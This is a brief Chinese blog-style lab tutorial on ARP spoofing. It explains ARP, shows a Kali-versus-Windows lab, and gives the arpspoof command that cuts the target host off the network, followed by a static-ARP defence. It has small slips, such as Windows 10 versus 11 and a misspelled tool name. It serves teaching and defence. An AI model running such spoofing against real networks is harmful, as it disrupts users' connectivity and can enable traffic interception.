ARP协议
arp协议(地址解析) ,在局域网中传输的是帧,帧里面有目标主机的MAC地址,其中一台电脑和另一台电脑需要知道对面的ip地址所对应的MAC地址
ARP欺骗的原理
把自己的MAC地址伪造成网段来欺骗其他用户
实验环境
kali:192.168.21.128
windows10:192.168.21.132
实验步骤
前提是知道目标的ip地址和网关
192.168.21.2的物理地址是00-50-56-f5-d5-f0
windows11:192.168.21.132 192.168.21.2
kali:查看局域网其他ip
扫描到192.168.21.132
使用工具:arspoof
arpspoof -i eth0 -t 受害者的ip 网关
arpspoof -i eth0 192.168.21.132 192.168.21.2
然后就开始攻击,查看windows10打开浏览器查看百度打开失败
结束kali攻击
再去ping百度
目的达到 使目标主机断网。
打开windosw,清除缓存,重新查看arp
防御:
只需在网关中添加一条固定(静态)的arp关系即可
标签:ARP,arp,网关,ip,21.132,192.168,地址,断网,欺骗 From: https://blog.csdn.net/qq_52333044/article/details/144158981